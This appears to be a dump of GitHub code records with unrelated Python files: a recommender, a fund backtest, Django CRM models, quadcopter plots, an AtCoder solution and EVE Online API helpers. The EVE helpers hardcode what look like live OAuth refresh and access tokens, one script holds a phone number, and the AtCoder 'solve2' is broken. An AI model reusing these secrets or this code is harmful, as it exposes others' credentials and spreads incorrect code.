publish.multiple(msgs, hostname=host)\n\n\n# vi: set fileencoding=utf-8 :","repo_name":"RafaelPBPinto/Gym-Home","sub_path":"Cam/mqtt_tentativa2/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"1884510779","text":"from py_imessage import imessage\n\nphone = \"4049530628\"\nmsg = \"hello\"\n\n\nguid = imessage.send(phone,\"I love you\")\n# Let the recipient read the message\nresp = imessage.status(guid)\nprint(f'Message was read at {resp.get(\"date_read\")}')","repo_name":"bc2026/coding-before-college","sub_path":"py/py_iMsg/py_iMsg.py","file_name":"py_iMsg.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19992850960","text":"import math\n\n\ndef compound_interest(principle, rate):\n # Calculates compound interest\n time = 0\n Amount = 0\n while Amount < max_balance:\n time += 1\n Amount = principle * (pow((1 + rate / 100), time))\n CI = Amount - principle\n\n print(time)\n return time\n\n\nmax_balance = 700000\nmin_balance = 50000\ninterest_rate = 7.1 # 7.1%\ntime = 0\nbalance = int(input())\n\nif min_balance < balance < max_balance:\n # A = P(1+(r/n)^(nt)\n # A = the future value of the investment/loan, including interest\n # P = the principal investment amount (the initial deposit or loan amount)\n # r = the annual interest rate (decimal)\n # n = the number of times that interest is compounded per unit t\n # t = the time the money is invested or borrowed for\n a = max_balance\n p = balance\n r = interest_rate\n t = 0\n # Driver Code\n time = compound_interest(p, r)\n","repo_name":"rickhaigh/python","sub_path":"Simple Banking System/Problems/Rich man's world/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74066679893","text":"import pandas as pd\nimport scipy.sparse as sparse\nfrom implicit.nearest_neighbours import bm25_weight\nfrom implicit.als import AlternatingLeastSquares\nimport numpy as np\n\n# Load your data from a CSV file (replace 'your_data.csv' with your actual file)\ndf = pd.read_csv('data.csv')\n\n# Convert 'rating' and 'userid' columns to numeric\ndf['rating'] = pd.to_numeric(df['rating'], errors='coerce')\ndf['userid'] = pd.to_numeric(df['userid'], errors='coerce')\n\n# Create mappings for user and film IDs\nuser_mapping = {user: i for i, user in enumerate(df['userid'].unique())}\nfilm_mapping = {film: i for i, film in enumerate(df['film'].unique())}\n\n# Use the mappings to create integer-based user and film IDs\ndf['userid'] = df['userid'].map(user_mapping)\ndf['film'] = df['film'].map(film_mapping)\n\n# Create a sparse matrix\nsparse_data = sparse.coo_matrix((df['rating'], (df['userid'], df['film'])))\n\n# Use the implicit library's BM25 weighting\nsparse_data = bm25_weight(sparse_data, K1=100, B=0.8)\n\n# Transpose the matrix\nuser_film_matrix = sparse_data.T.tocsr()\n\n# Create the model and fit it\nmodel = AlternatingLeastSquares(factors=64, regularization=0.05, alpha=2.0, random_state=42)\nmodel.fit(user_film_matrix)\n\nfor x in range(1, 5):\n # Choose a sample user ID for recommendations\n sample_userid = x\n\n # Get recommendations for the sample user\n ids, scores = model.recommend(sample_userid, user_film_matrix[sample_userid], N=10, filter_already_liked_items=False)\n\n # Inverse mappings to get original film names\n inverse_film_mapping = {i: film for film, i in film_mapping.items()}\n result = pd.DataFrame({\"film\": [inverse_film_mapping.get(i, 'Unknown') for i in ids], \"score\": scores})\n\n print(result)\n","repo_name":"lewisblackburn/sample_recommendation_system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41487957769","text":"#!/usr/bin/env python3\n\nperTable = open('periodic_table.txt')\nam = {} # Dictionary going from atomic symbols to masses\nfor i in perTable:\n if i:\n line = i.split(',')\n atomicSymbol = line[-1][:-1] #[:-1] to shred off the \\n\n atomicMass = float(line[1])\n am[atomicSymbol] = atomicMass\nperTable.close()\nprint(\"Sample input: 'H 2 O 13.2' for 13.2 grams of H2O\")\nprint(\"Ctrl + c to stop the program.\")\nwhile(True):\n question = input().split(' ')\n # Time to parse the input!\n elements = []\n numbers = []\n m = float(question[-1]) # last thing is _always_ the mass\n question = question[:-1] #lose the mass\n i = 0 # we'll do a manual for loop, while-style\n while i < len(question):\n element = question[i]\n #get an element and check if the thing after 1) exists and 2) is a number\n if i < len(question) - 1 and question[i + 1].isdigit():\n number = question[i + 1]\n # if it does, we skip the next thing because it's a number\n i += 1\n else:\n #otherwise assume 1\n number = 1\n elements.append(element)\n numbers.append(number)\n i += 1\n numFirst = 0\n M = 0\n i = 0\n while i nav:\n mnt_inv = min(prev_inv + increment, max_inv)\n else:\n mnt_inv = max(prev_inv - increment, min_inv)\n return mnt_inv\n\ndef is_cashflow_missing(cashflows):\n if len(cashflows) == 0:\n return True\n \n for c in cashflows:\n (date, cf) = c\n if cf == 0:\n return True\n \n return False\n \ndef run(nav_file, ma_type):\n nav_data = common.read_from_file(nav_file)\n fund_names = nav_data[0].split(',')[1:]\n del nav_data[1:7]\n ma_data = get_ma_data(nav_data)\n del nav_data[0:7]\n \n cashflows = common.init_array_dict(fund_names)\n fund_inv_dict = common.init_dict(fund_names)\n fund_corpus_dict = common.init_dict(fund_names)\n fund_corpus_index_dict = common.init_array_dict(fund_names)\n last_inv_dict = common.init_dict(fund_names, default_inv)\n returns_halfyr = common.init_array_dict(fund_names)\n returns_annual = common.init_array_dict(fund_names)\n units_dict_halfyr = common.init_dict(fund_names)\n units_dict_annual = common.init_dict(fund_names)\n units_dict_overall = common.init_dict(fund_names)\n \n cnt = len(nav_data)\n max_total_inv = default_inv * (cnt - 1)\n for i in xrange(0, cnt):\n \n row_data = nav_data[i].split(',')\n dt = datetime.strptime(row_data[0], '%d-%m-%Y')\n fund_nav = row_data[1:]\n fund_nav_dict = common.get_fund_nav_dict(fund_names, fund_nav)\n \n # half-yearly returns for each fund\n if i % 6 == 0 and i > 0:\n \n wealth = common.get_fund_wealth(fund_nav_dict, units_dict_halfyr)\n for fund in fund_names:\n start_corpus = fund_corpus_index_dict[fund][i-7]\n end_corpus = fund_corpus_index_dict[fund][i-1]\n corpus_wealth = end_corpus - start_corpus\n total_wealth = wealth[fund] + corpus_wealth\n \n cashflows_halfyr = cashflows[fund][i-6:i] # slice last 6 months cashflows\n if is_cashflow_missing(cashflows_halfyr):\n continue\n \n cf = (dt, total_wealth)\n cashflows_halfyr.append(cf)\n ret = common.xirr(cashflows_halfyr)\n returns_halfyr[fund].append(ret)\n\n # clean up\n units_dict_halfyr = common.init_dict(fund_names)\n\n # annual returns for each fund\n if i % 12 == 0 and i > 0:\n \n wealth = common.get_fund_wealth(fund_nav_dict, units_dict_annual)\n for fund in fund_names:\n start_corpus = fund_corpus_index_dict[fund][i-13]\n end_corpus = fund_corpus_index_dict[fund][i-1]\n corpus_wealth = end_corpus - start_corpus\n total_wealth = wealth[fund] + corpus_wealth\n \n cashflows_annual = cashflows[fund][i-12:i] # slice last 12 months cashflows\n if is_cashflow_missing(cashflows_annual):\n continue\n \n cf = (dt, wealth[fund] + fund_corpus_dict[fund])\n cashflows_annual.append(cf)\n ret = common.xirr(cashflows_annual)\n returns_annual[fund].append(ret)\n\n # clean up\n units_dict_annual = common.init_dict(fund_names)\n \n # no investment on the last date\n if i == cnt - 1:\n break\n \n for f in fund_names:\n \n # cap total investment\n allowed_inv = max_total_inv - fund_inv_dict[f]\n \n prev_inv = last_inv_dict[f]\n nav = fund_nav_dict[f]\n ma = ma_data[f][i]\n \n # equity investment\n mnt_inv = get_mnt_inv(ma_type, prev_inv, nav, ma)\n mnt_inv = min(mnt_inv, allowed_inv)\n last_inv_dict[f] = mnt_inv\n allowed_inv -= mnt_inv\n \n # debt investment\n corpus = fund_corpus_dict[f]\n debt_inv = default_inv - mnt_inv\n if debt_inv < 0:\n debt_inv = -min(mnt_inv - default_inv, corpus)\n else:\n debt_inv = min(debt_inv, allowed_inv)\n \n # corpus investment + interest\n corpus += debt_inv\n interest = corpus * int_rate\n corpus += interest\n fund_corpus_dict[f] = corpus\n fund_corpus_index_dict[f].append(corpus)\n \n # total investment\n total_inv = mnt_inv + debt_inv\n fund_inv_dict[f] += total_inv\n\n # invested units\n units = mnt_inv / nav\n units_dict_overall[f] += units\n units_dict_halfyr[f] += units\n units_dict_annual[f] += units\n\n # cashflows\n cf = (dt, -total_inv)\n cashflows[f].append(cf)\n\n # debugging\n # if f == 'Birla_Advantage_Fund':\n # print '%d\\t%d\\t%d\\t%.2f\\t%d\\t%d' % (mnt_inv, debt_inv, round(fund_inv_dict[f]), units, -total_inv, round(corpus))\n\n file_data = []\n \n header_line = \\\n 'Fund,Investment,Wealth,Absolute Return,Annualized Return,' + \\\n 'Half-Yr Return Mean,Half-Yr Return Std Dev,Half-Yr Sharpe,' + \\\n 'Annual Return Mean,Annual Return Std Dev,Annual Sharpe'\n file_data.append(header_line)\n \n # final wealth\n nav_line = nav_data[cnt - 1].split(',')[1:]\n fund_nav_dict = common.get_fund_nav_dict(fund_names, nav_line)\n wealth = common.get_fund_wealth(fund_nav_dict, units_dict_overall)\n\n # performance stats for each fund\n last_date = nav_data[cnt - 1].split(',')[0]\n dt = datetime.strptime(last_date, '%d-%m-%Y')\n for fund in sorted(fund_names): \n total_wealth = wealth[fund] + fund_corpus_dict[fund]\n fund_cashflows = cashflows[fund][:]\n cf = (dt, total_wealth)\n fund_cashflows.append(cf)\n \n fund_inv = fund_inv_dict[fund]\n abs_return = ((total_wealth / fund_inv) - 1)\n ann_return = common.xirr(fund_cashflows)\n \n hfr = returns_halfyr[fund]\n halfyr_rf_rate = common.get_rf_rate('half-yearly')\n halfyr_return_mean = numpy.mean(hfr)\n halfyr_return_std = numpy.std(hfr)\n halfyr_sharpe = common.get_sharpe_ratio(hfr, halfyr_rf_rate)\n\n afr = returns_annual[fund]\n annual_rf_rate = common.get_rf_rate('annual')\n annual_return_mean = numpy.mean(afr)\n annual_return_std = numpy.std(afr)\n annual_sharpe = common.get_sharpe_ratio(afr, annual_rf_rate)\n \n line_data = \\\n fund + ',' + str(fund_inv) + ',' + str(total_wealth) + ',' + \\\n str(abs_return) + ',' + str(ann_return) + ',' + \\\n str(halfyr_return_mean) + ',' + str(halfyr_return_std) + ',' + \\\n str(halfyr_sharpe) + ',' + str(annual_return_mean) + ',' + \\\n str(annual_return_std) + ',' + str(annual_sharpe)\n file_data.append(line_data)\n \n ma_file_name = 'ma_with_debt_' + ma_type + '.csv'\n ma_file = os.path.join(data_dir, ma_file_name)\n common.write_to_file(ma_file, file_data)\n \ndef main():\n script, nav_file, ma_type = sys.argv\n run(nav_file, ma_type)\n pass\n \nif __name__ == '__main__':\n main()","repo_name":"justchells/FinProj","sub_path":"V1/ma_with_debt.py","file_name":"ma_with_debt.py","file_ext":"py","file_size_in_byte":7478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72937491734","text":"import torch\nimport numpy as np\nimport torch.nn as nn\nfrom SegModel.UNet import UNet\n\nfrom PreProcess.DistanceMapNumpy import DistanceMap\n\n\ndevice = torch.device('cuda:1' if torch.cuda.is_available() else 'cpu')\nclass TwoUNet(nn.Module):\n def __init__(self, in_channels, out_channels, filters=32):\n super(TwoUNet, self).__init__()\n self.unet1 = UNet(in_channels, out_channels-2, filters=32)\n self.unet2 = UNet(in_channels, out_channels, filters=32)\n\n def forward(self, x, epoch):\n\n if epoch > 10:\n out1 = self.unet1(x)\n\n out1_copy = out1[:, 2, ...].cpu().data.numpy()\n dis_map_list = []\n for batch in range(out1_copy.shape[0]):\n dis_map_list.append(DistanceMap(out1_copy[batch, ...]))\n dis_map = np.array(dis_map_list)\n dis_map = dis_map[:, np.newaxis, ...]\n dis_map = torch.from_numpy(dis_map).to(device)\n assert dis_map.shape == x.shape\n\n out2 = self.unet2(dis_map*x)\n\n return out1, out2\n else:\n out1 = self.unet1(x)\n return out1","repo_name":"Cherishzyh/ProstateXSeg","sub_path":"SegModel/TwoUNet.py","file_name":"TwoUNet.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"16619104146","text":"#!/usr/bin/env python3\n# from typing import *\n\nimport sys\nfrom collections import defaultdict\n\nsys.setrecursionlimit(10 ** 8)\n\nif not __debug__:\n from icecream import ic\n def debug(*x): ic(x)\nelse:\n def debug(*x): pass\n\n# def solve(N: int, M: int, p: List[int], x: List[int], y: List[int]) -> int:\n\n\ndef solve(N, M, p, X, Y):\n CHILD = \"child\"\n CHECK = \"check\"\n person_data = {i+1: {CHILD: set(), CHECK: False} for i in range(N)}\n insurance = defaultdict(int)\n\n ans = 0\n\n for i, v in enumerate(p, 2):\n person_data[v][CHILD].add(i)\n\n for x, y in zip(X, Y):\n insurance[x] = max(insurance[x], y)\n\n def __solve(person_id, depth):\n if depth > 0:\n person_data[person_id][CHECK] = True\n\n for child_id in person_data[person_id][CHILD]:\n person_data[child_id][CHECK] = True\n debug(person_data[person_id], person_data[child_id])\n __solve(child_id, depth-1)\n\n debug(person_data, insurance)\n\n for k, v in insurance.items():\n __solve(k, v)\n\n debug(person_data)\n\n for v in person_data.values():\n ans += 1 if v[CHECK] else 0\n\n return ans\n\n\ndef solve2(N, M, P, X, Y):\n dp = [-1 for _ in range(N)]\n ans = 0\n\n # for x, y in zip(X, Y):\n # dp[x] = max(dp[x], y)\n # debug(dp, P)\n # for i in range(1, N):\n # dp[i] = max(dp[i], dp[P[i]]-1)\n\n for v in dp:\n ans += v >= 0\n\n return ans\n\n\n# generated by oj-template v4.8.1 (https://github.com/online-judge-tools/template-generator)\n\n\ndef main():\n import sys\n tokens = iter(sys.stdin.read().split())\n N = int(next(tokens))\n M = int(next(tokens))\n p = [None for _ in range(N - 1)]\n x = [None for _ in range(M)]\n y = [None for _ in range(M)]\n for i in range(N - 1):\n p[i] = int(next(tokens)) - 1\n for i in range(M):\n x[i] = int(next(tokens)) - 1\n y[i] = int(next(tokens))\n assert next(tokens, None) is None\n a = solve2(N, M, p, x, y)\n print(a)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"newbie1111/Programming-Contests","sub_path":"atcoder.jp/abc309/abc309_e/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20321614831","text":"import os\nfrom django.db import models\nfrom django.utils.crypto import get_random_string\nfrom .constants import BUSINESS_ROLES, OFFICE_TYPES\nfrom stdimage.models import StdImageField\nfrom remark.lib.tokens import public_id\n\n\ndef bus_public_id():\n \"\"\"Public identifier for a business.\"\"\"\n return public_id(\"bus\")\n\n\ndef peep_public_id():\n \"\"\"Public identifier for a business.\"\"\"\n return public_id(\"peep\")\n\n\ndef off_public_id():\n \"\"\"Public identifier for a business.\"\"\"\n return public_id(\"off\")\n\n\ndef avatar_media_path(person, filename):\n \"\"\"\n Given a User instance, and the filename as supplied during upload,\n determine where the uploaded avatar image should actually be placed.\n\n See https://docs.djangoproject.com/en/2.1/ref/models/fields/#filefield\n\n Note: Thumbnail generation works fine on FileSystemStorage, but not on S3.\n To overcome this known issue, append random 7-char string to end of file name.\n Though, old files will not be deleted from S3 on image replacement.\n\n person//avatar_<.ext>\n person//avatar_.regular<.ext>\n person//avatar_.thumbnail<.ext>\n \"\"\"\n _, extension = os.path.splitext(filename)\n random_str = get_random_string(length=7)\n return f\"person/{person.public_id}/avatar_{random_str}{extension}\"\n\n\nclass Business(models.Model):\n public_id = models.CharField(\n primary_key=True,\n default=bus_public_id,\n help_text=\"A unique identifier for this business that is safe to share publicly.\",\n max_length=24,\n editable=False,\n )\n\n name = models.CharField(max_length=255, blank=False, help_text=\"Business Name\")\n\n is_property_owner = models.BooleanField(\n default=False, help_text=\"Business Type is Property Owner\"\n )\n\n is_asset_manager = models.BooleanField(\n default=False, help_text=\"Business Type is Asset Manager\"\n )\n\n is_property_manager = models.BooleanField(\n default=False, help_text=\"Business Type is Property Manager\"\n )\n\n is_remarkably = models.BooleanField(\n default=False, help_text=\"Business Type is Remarkably\"\n )\n\n is_developer = models.BooleanField(\n default=False, help_text=\"Business Type is Developer\"\n )\n \n def get_roles(self):\n roles = []\n for k in BUSINESS_ROLES:\n if getattr(self, k, None):\n roles.append(BUSINESS_ROLES[k])\n return roles\n\n is_investor = models.BooleanField(\n default=False, help_text=\"Business Type is JV / Investor\"\n )\n\n is_vendor = models.BooleanField(\n default=False, help_text=\"Business Type is Vendor / Consultant\"\n )\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"Businesses\"\n\n\nclass OfficeManager(models.Manager):\n pass\n\n\nclass Office(models.Model):\n public_id = models.CharField(\n primary_key=True,\n default=off_public_id,\n help_text=\"A unique identifier for this person that is safe to share publicly.\",\n max_length=24,\n editable=False,\n )\n\n is_home_office = models.BooleanField(default=False, help_text=\"Is the home office?\")\n\n name = models.CharField(\n default=\"\", max_length=255, null=True, blank=False, help_text=\"Office Name\"\n )\n\n address = models.ForeignKey(\n \"geo.Address\", on_delete=models.CASCADE, null=True, blank=False, help_text=\"Address\"\n )\n\n business = models.ForeignKey(\n \"crm.Business\", on_delete=models.CASCADE, null=True, blank=False, help_text=\"Business\"\n )\n\n office_type = models.IntegerField(\n choices=OFFICE_TYPES, help_text=\"Office Type\", blank=True, null=True\n )\n\n objects = OfficeManager()\n\n def __str__(self):\n if self.business:\n s = \"{}: {} ({})\".format(self.business.name, self.name, self.public_id)\n else:\n s = \"{} ({})\".format(self.name, self.public_id)\n return s\n\n\nclass PeopleManager(models.Manager):\n pass\n\n\nclass Person(models.Model):\n public_id = models.CharField(\n primary_key=True,\n default=peep_public_id,\n help_text=\"A unique identifier for this person that is safe to share publicly.\",\n max_length=24,\n editable=False,\n )\n\n first_name = models.CharField(max_length=255, blank=False, help_text=\"First Name\")\n\n last_name = models.CharField(max_length=255, blank=False, help_text=\"Last Name\")\n\n # xxx May want to restrict input on this in the future\n role = models.CharField(max_length=255, blank=False, help_text=\"Job Role\")\n\n email = models.CharField(max_length=255, blank=False, help_text=\"Email\")\n\n office_phone_country_code = models.CharField(max_length=5, blank=True, help_text=\"Office phone country code\")\n\n office_phone = models.CharField(\n max_length=255, blank=True, help_text=\"Office Phone\"\n )\n\n office_phone_ext = models.CharField(max_length=255, blank=True, help_text=\"Phone extension\")\n\n # cell_phone = models.CharField(max_length=255, blank=True, help_text=\"Cell Phone\")\n\n office = models.ForeignKey(\n \"crm.Office\",\n on_delete=models.CASCADE,\n null=True,\n blank=False,\n help_text=\"Office the person works at\",\n )\n\n user = models.OneToOneField(\n \"users.User\",\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n help_text=\"User associated with this person\",\n )\n\n avatar = StdImageField(\n null=True,\n blank=True,\n default=\"\",\n upload_to=avatar_media_path,\n help_text=\"\"\"A full-resolution user avatar.
Resized variants (100x100, 36x36) will also be created on Amazon S3.\"\"\",\n variations={\"regular\": (100, 100, True), \"thumbnail\": (36, 36, True)},\n )\n\n objects = PeopleManager()\n\n @property\n def full_name(self):\n return f\"{self.first_name} {self.last_name}\"\n\n def __str__(self):\n if self.office:\n s = \"{}: {} {} ({})\".format(\n self.office.business.name, self.first_name, self.last_name, self.public_id\n )\n else:\n s = \"{} {} ({})\".format(\n self.first_name, self.last_name, self.public_id\n )\n return s\n","repo_name":"konaindev/React-Django","sub_path":"remark/crm/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"36681059584","text":"#!/usr/bin/env python3\nimport numpy as np\n\n\nclass Action:\n \"\"\"Robot action.\n\n The length of the attributes depends on the robot type. In the following\n ``n_joints`` is the number of joints and ``n_fingers`` the number of\n fingers (e.g. for the TriFinger robots ``n_fingers = 3, n_joints = 9``).\n\n Attributes:\n torque (array, shape=(n_joints,)): Torque commands for the joints.\n position (array, shape=(n_joints,)): Position commands for the joints.\n Set to NaN to disable position control for the corresponding joint.\n kp (array, shape=(n_joints,)): P-gain for position controller. Set to\n NaN to use default gain for the corresponding joint.\n kd (array, shape=(n_joints,)): D-gain for position controller. Set to\n NaN to use default gain for the corresponding joint.\n \"\"\"\n\n def __init__(self, torque, position, kp=None, kd=None):\n \"\"\"Initialize\n\n Args:\n torque: See :attr:`torque`.\n position: See :attr:`position`.\n kp: See :attr:`kp`.\n kd: See :attr:`kd`.\n \"\"\"\n self.torque = np.asarray(torque)\n self.position = np.asarray(position)\n\n if kp is None:\n self.position_kp = np.full_like(position, np.nan, dtype=float)\n else:\n self.position_kp = kp\n\n if kd is None:\n self.position_kd = np.full_like(position, np.nan, dtype=float)\n else:\n self.position_kd = kd\n","repo_name":"rr-learning/rrc_simulation","sub_path":"python/rrc_simulation/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"67"} +{"seq_id":"16967079782","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport csv\n\n\ndef plot_single_multiple_run(results):\n \n plt.subplots(figsize=(15,15))\n plt.subplot(3,3,1)\n plt.title('Position of Quadcopter')\n plt.plot(results['time'], results['x'], label='x')\n plt.plot(results['time'], results['y'], label='y')\n plt.plot(results['time'], results['z'], label='z')\n plt.title(\"Position (z --> 0)\")\n plt.xlabel('Time, seconds')\n plt.ylabel('Position')\n plt.grid(True)\n plt.legend()\n \n plt.subplot(3,3,2)\n plt.title('Velocity of Quadcopter')\n plt.plot(results['time'], results['x_velocity'], label='x_hat')\n plt.plot(results['time'], results['y_velocity'], label='y_hat')\n plt.plot(results['time'], results['z_velocity'], label='z_hat')\n plt.title(\"Velocities (|v| --> small)\")\n plt.xlabel('Time, seconds')\n plt.ylabel('Velocity')\n plt.grid(True)\n plt.legend()\n\n plt.subplot(3,3,3)\n plt.title('Euler angles')\n plt.plot(results['time'], normalize_angle(results['phi']), label='phi')\n plt.plot(results['time'], normalize_angle(results['theta']), label='theta')\n plt.plot(results['time'], normalize_angle(results['psi']), label='psi')\n plt.title(\"Orientation \")\n plt.xlabel('Time, seconds')\n plt.grid(True)\n plt.legend()\n\n plt.subplot(3,3,4)\n plt.title('Angular Velocity')\n plt.plot(results['time'], results['phi_velocity'], label='phi_velocity')\n plt.plot(results['time'], results['theta_velocity'], label='theta_velocity')\n plt.plot(results['time'], results['psi_velocity'], label='psi_velocity')\n plt.xlabel('Time, seconds')\n plt.grid(True)\n plt.legend()\n \n plt.subplot(3, 3, 5)\n plt.title('Rotor Speed')\n plt.plot(results['time'], results['rotor_speed1'], label='Rotor 1')\n plt.plot(results['time'], results['rotor_speed2'], label='Rotor 2')\n plt.plot(results['time'], results['rotor_speed3'], label='Rotor 3')\n plt.plot(results['time'], results['rotor_speed4'], label='Rotor 4')\n plt.xlabel('Time, seconds')\n plt.ylabel('Rotor Speed, revolutions / second')\n plt.grid(True)\n plt.legend()\n\n plt.subplot(3, 3, 6)\n plt.title('Reward')\n plt.plot(results['time'], results['reward'], label='Reward')\n plt.xlabel('Time, seconds')\n plt.ylabel('Reward')\n plt.show()\n return plt\n\ndef plot_lastdata(results,numofepisode):\n\n plt.figure(figsize=(15,10))\n plt.subplot(2,2,1)\n plt.plot(results['episode'], results['reward'])\n plt.xlabel('No of episodes')\n plt.ylabel('Rewards ')\n plt.xlim(xmin=0,xmax=np.max(results['episode'])+2)\n plt.title(\"Rewards per episode\")\n\n plt.subplot(2,2,2)\n plt.plot(results['episode'][-numofepisode:], results['reward'][-numofepisode:])\n plt.xlabel('No of episodes')\n plt.ylabel('Rewards ')\n plt.xlim(xmin=np.max(results['episode'])-20,xmax=np.max(results['episode'])+2)\n plt.ylim(ymin=0,ymax=np.max(results['reward'])+2)\n plt.title(\"Reward for last 10 episodes\")\n plt.show()\n\n return plt\n\ndef normalize_angle(angles):\n # Adjust angles to range -pi to pi\n norm_angles = np.copy(angles)\n for i in range(len(norm_angles)):\n while norm_angles[i] > np.pi:\n norm_angles[i] -= 2 * np.pi\n return norm_angles\n","repo_name":"kavichan/Quadcopter_project","sub_path":"graphutil.py","file_name":"graphutil.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1183929938","text":"import random\r\nimport string\r\nimport requests\r\nimport datetime\r\nimport base64\r\nimport json\r\nimport os\r\n\r\n### Global variables\r\nbase_api = \"https://esi.evetech.net/dev/\"\r\n\r\nseat_client_id = os.environ['SEAT_CLIENT_ID']\r\nseat_client_secret = os.environ['SEAT_CLIENT_SECRET']\r\n\r\nclient_id = os.environ['CLIENT_ID']\r\nclient_secret = os.environ['CLIENT_SECRET']\r\n\r\ndef gen_random_string(length):\r\n\r\n return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(length))\r\n\r\n#######################\r\n## Private Functions ##\r\n#######################\r\n\r\ndef get_format_from_raw(raw, cursor):\r\n result = [dict(line) for line in [zip([column[0] for column in cursor.description], row) for row in raw]][0]\r\n return result\r\n\r\ndef get_format_from_raw_full(raw, cursor):\r\n result = [dict(line) for line in [zip([column[0] for column in cursor.description], row) for row in raw]]\r\n return result\r\n\r\ndef date_to_string(datetime):\r\n output = datetime.strftime(\"%Y-%m-%d %H:%M:%S\")\r\n return output\r\n\r\n\r\n### Function for making a call to an API ###\r\ndef api_call_get(endpoint, data):\r\n path = base_api + endpoint\r\n\r\n\r\n # Converting the data set into GET url\r\n data_string = \"?\"\r\n for entry in data:\r\n data_string = data_string + str(entry) + \"=\" + str(data[entry]) + '&'\r\n\r\n # Appending to path\r\n path = path + data_string\r\n path = path[0:len(path) - 1]\r\n bearer = {'Authorization': 'Bearer ' + data['token']}\r\n\r\n print(\"Sending request to \" + str(path) + \" with data of \" + str(data) + \" and header of \" + str(bearer))\r\n\r\n response = requests.get(path, data=\"\", headers=bearer)\r\n\r\n return response\r\n\r\n### Converting all instances of datetime into a string for output purposes\r\n### Requires an array as input\r\ndef encode_datetime(result):\r\n\r\n # Performing format fix\r\n new_result_output = []\r\n for value in result:\r\n\r\n ### Building the new output value\r\n new_value = value\r\n\r\n for element in value:\r\n data = value[element]\r\n if isinstance(data, datetime.datetime):\r\n\r\n new_value[element] = date_to_string(value[element])\r\n\r\n new_result_output.append(new_value)\r\n\r\n return new_result_output\r\n\r\ndef manual_request():\r\n\r\n print(\"Performing manual api request\")\r\n return str(manual_request_location())\r\n\r\ndef manual_request_access_token():\r\n\r\n ### Attempting to perform a manual access token call from a refresh token...\r\n refresh_token = \"7e1Oqv_aG8zaUrhmAEslqWeZ0WNozVh2UGt3_c7CV3uIxPkCVmMgTIC4DaFYZdkrfsAxcPQyAqcFNwTIWJXF2a_NcXSoUVgWkZCxex-XvFhPxML8gvRO-NK4an3_S3BQf4A8YOpoVnpmWY2IMKyf3d5h14XSPj_G2q5_Wd0k1ThQmmopu6_lD6sezT_eAZ6dVi5sNndeRNiGhi386__sIJ6ZWD23Hw5t_QJVudC8FAdtQ--xeuPhkAMcZgnGKU5LdUPWNW_P8XyExdLHCr6jK2EcJc_GlRGvfo8r_cCWsjnWoxt3c-L-1-uW3lfrtynjz3BcFs0RI9tepTUrODfjRkvCYM4pnYVNJ50MaBzuXvY\"\r\n authorization = gen_base64_seat_auth()\r\n authorization = authorization.decode('ascii')\r\n authorization = 'Basic ' + authorization\r\n\r\n # 2115529576\r\n\r\n headers = {\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Host': 'login.eveonline.com',\r\n 'Authorization': authorization\r\n }\r\n\r\n url = \"https://login.eveonline.com/oauth/token\"\r\n payload = {'grant_type': 'refresh_token', 'refresh_token': str(refresh_token)}\r\n\r\n r = requests.post(url, headers=headers, data=payload)\r\n output = json.loads(r.content.decode('utf-8'))\r\n print(output)\r\n\r\ndef manual_request_location():\r\n\r\n access_token = \"1|CfDJ8HHFK/DOe6xKoNPHamc0mCVVB9iCNcpOblsQEtOeQ5Fvhr+5kvx5VUedZp+3y1XDCnMWupl4aVZPtQ6nTp0TTYFO1crgSDDv1qye1LdIGUmH+ovhJgEwnMS1LkA6zLtAnnVwdAfxyNDcFXubmls9NcEWv8F///+RoRkCXS5adYYS\"\r\n character_id = \"2115529576\"\r\n\r\n result_location = api_call_get(\"characters/\" + str(character_id) + \"/wallet/journal/\",\r\n {\"character_id\": character_id, \"token\": access_token, \"page\": 1})\r\n\r\n print(result_location)\r\n print(result_location.reason)\r\n print(result_location.content)\r\n\r\n return result_location.content\r\n\r\n# Function for generating base 64 auth\r\ndef gen_base64_auth():\r\n prebase = str.encode(client_id+\":\"+client_secret)\r\n base64auth = base64.b64encode(prebase)\r\n return base64auth\r\n\r\n# Function for generating base 64 auth\r\ndef gen_base64_seat_auth():\r\n prebase = str.encode(seat_client_id+\":\"+seat_client_secret)\r\n base64auth = base64.b64encode(prebase)\r\n return base64auth\r\n\r\ndef convert_name_to_invtype(name, mydb):\r\n cursor = mydb.cursor()\r\n\r\n location_get = \"SELECT typeID FROM db_static.invTypes WHERE typeName = %s\"\r\n cursor.execute(location_get, (name,))\r\n result_raw = cursor.fetchall()\r\n return result_raw[0][0]\r\n\r\ndef convert_invtype_to_name(invtype, mydb):\r\n cursor = mydb.cursor()\r\n\r\n location_get = \"SELECT typeName FROM db_static.invTypes WHERE typeID = %s\"\r\n cursor.execute(location_get, (invtype,))\r\n result_raw = cursor.fetchall()\r\n return 